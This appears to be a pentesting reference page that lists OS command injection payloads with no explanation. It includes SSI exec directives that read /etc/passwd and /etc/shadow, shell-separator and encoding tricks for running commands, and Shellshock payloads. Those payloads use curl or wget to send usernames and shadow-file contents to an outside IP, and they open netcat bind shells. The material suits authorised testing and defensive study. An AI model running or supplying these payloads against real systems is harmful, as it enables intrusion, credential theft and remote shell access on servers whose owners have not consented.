OS-Command-Injection
<!--#exec%20cmd="/bin/cat%20/etc/passwd"--><!--#exec%20cmd="/bin/cat%20/etc/shadow"--><!--#exec%20cmd="/usr/bin/id;--><!--#exec%20cmd="/usr/bin/id;-->/index.html|id|;id;;id;netstat -a;;system('cat%20/etc/passwd');id;|id|/usr/bin/id|id||/usr/bin/id|||/usr/bin/id||id;||/usr/bin/id;;id|!id!%id%||id||!id%id;|/usr/bin/id|\n/bin/ls -al\n\n/usr/bin/id\n\nid\n\n/usr/bin/id;\nid;\n/usr/bin/id|\nid|;/usr/bin/id\n;id\n|usr/bin/id\n|nid\n`id``/usr/bin/id`a);ida;ida);id;a;id;a);id|a;id|a)|ida|ida)|id;a|id|/bin/ls -ala);/usr/bin/ida;/usr/bin/ida);/usr/bin/id;a;/usr/bin/id;a);/usr/bin/id|a;/usr/bin/id|a)|/usr/bin/ida|/usr/bin/ida)|/usr/bin/id;a|/usr/bin/id;system('cat%20/etc/passwd');system('id');system('/usr/bin/id')%0Acat%20/etc/passwd%0A/usr/bin/id%0Aid%0A/usr/bin/id%0A%0Aid%0A& ping -i 30 127.0.0.1 && ping -n 30 127.0.0.1 &%0a ping -i 30 127.0.0.1 %0a`ping 127.0.0.1`-c 10 127.0.0.1-c 10 google.comx||ping+-c+10+127.0.0.1||||ping+-c+10+127.0.0.1||||id>/var/www/html/id.txt||||nslookup+www.nsa.gov||x&&ping+-c+10+127.0.0.1||&&ping+-c+10+127.0.0.1&&|id&id;id||id&&id%0aid%0a`id`||nslookup+`whoami`.localhost.com||$;/usr/bin/idcat ${HOME:0:1}etc${HOME:0:1}passwdcat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwdcat $(echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")cat $(xxd -r -p <<< 2f6574632f706173737764)cat $(xxd -r -ps <(echo 2f6574632f706173737764))c'a't /etc/passwdc"a"t /etc/passwdc\a\t /etc/passwdca$@t /etc/passwd/???/c?t /etc/passwd/???/c?t /?tc/?as?wd() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"cat /etc/hosts$(`cat /etc/passwd`)cat /etc/passwd%0Acat%20/etc/passwd{{ get_user_file("/etc/passwd") }}<!--#exec cmd="/bin/cat /etc/passwd"--><!--#exec cmd="/bin/cat /etc/shadow"--><!--#exec cmd="/usr/bin/id;-->system('cat /etc/passwd');Last updated